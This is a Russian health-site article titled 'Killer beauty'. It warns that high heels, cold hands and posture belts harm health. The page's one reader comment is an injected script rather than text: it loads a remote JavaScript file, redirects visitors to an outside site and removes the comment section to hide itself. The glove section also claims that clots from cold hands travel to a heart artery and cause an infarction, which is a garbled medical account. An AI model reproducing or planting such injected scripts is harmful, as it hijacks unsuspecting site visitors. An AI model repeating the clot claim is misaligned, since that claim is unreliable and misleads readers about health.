Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Убийственная красота  >>  Убийственная красота
 
Обратная связь
 

Убийственная красота

Размер шрифта
26 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Красота может сколько угодно требовать жертв, но если в жертву надо принести здоровье, от такой красоты лучше отказаться. Что убивает ваше здоровье?

Туфли

На высоких каблуках ноги будут отекать быстрее, потому что нарушается кровообращение в стопе. При ходьбе на каблуках мышцы голени работают хуже, а ведь именно эти мышцы перекачивают кровь в стопы. Помимо отеков, нарушенное кровообращение приводит к тромбофлебиту и варикозным звездочкам на ногах. Дальше – ишемия стопы, особенно если сосуды поражены атеросклерозом.

Что делать

Носить правильную обувь на каблуке не выше 4 см.

Перчатки

В холодную погоду, чтобы сохранить тепло внутри, поверхностные сосуды сильно сужаются. В результате кровоток в них замедляется, кровь становится густой и вязкой, красные кровяные тельца прилипают друг к другу и образуют сгустки, которые еще называют тромбами.

Поскольку нарушается кровоток – руки могут отекать. Но это еще не все! Тромб может оторваться и двинуться по кровеносным сосудам к сердцу. Достигнув сердечной артерии, тромб перекрывает ее. Сердечная мышца погибает от нехватки кислорода – развивается инфаркт миокарда.

Что делать

Носите перчатки. Если же и они не помогают от отекших рук, надевайте компрессионные перчатки. Они регулируют кровообращение в кистях и руках.

Пояс для осанки

Пояс для поддержания осанки может привести к мышечной слабости в спине, поскольку такой пояс переносит нагрузку со спины на живот, таз и ноги. Поскольку мышцы не сокращаются, это ослабляет мышцы спины. Вот почему нельзя носить такие пояса весь день, не снимая.

Что делать

Выполняйте упражнения для спины и осанки.

Видеосюжеты по теме:

Убийственная красота. Стоит ли приносить ей в жертву свое здоровье



 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Гирудотерапия. Поможет ли пиявка от варикоза?   Новое о чае. Дополнительные аргументы в пользу чаепития   Что с вами делает злость?   Лечение варикоза. Что важно знать при выборе клиники?  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Самые стыдные вопросы о красоте. Часть 2
Есть ли секс после инфаркта?
5 причин, почему болит внизу живота...

Тесты

Будет ли у вас инфаркт?
Грозит ли вам инфаркт миокарда?
Есть ли у вас варикозное расширение вен?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.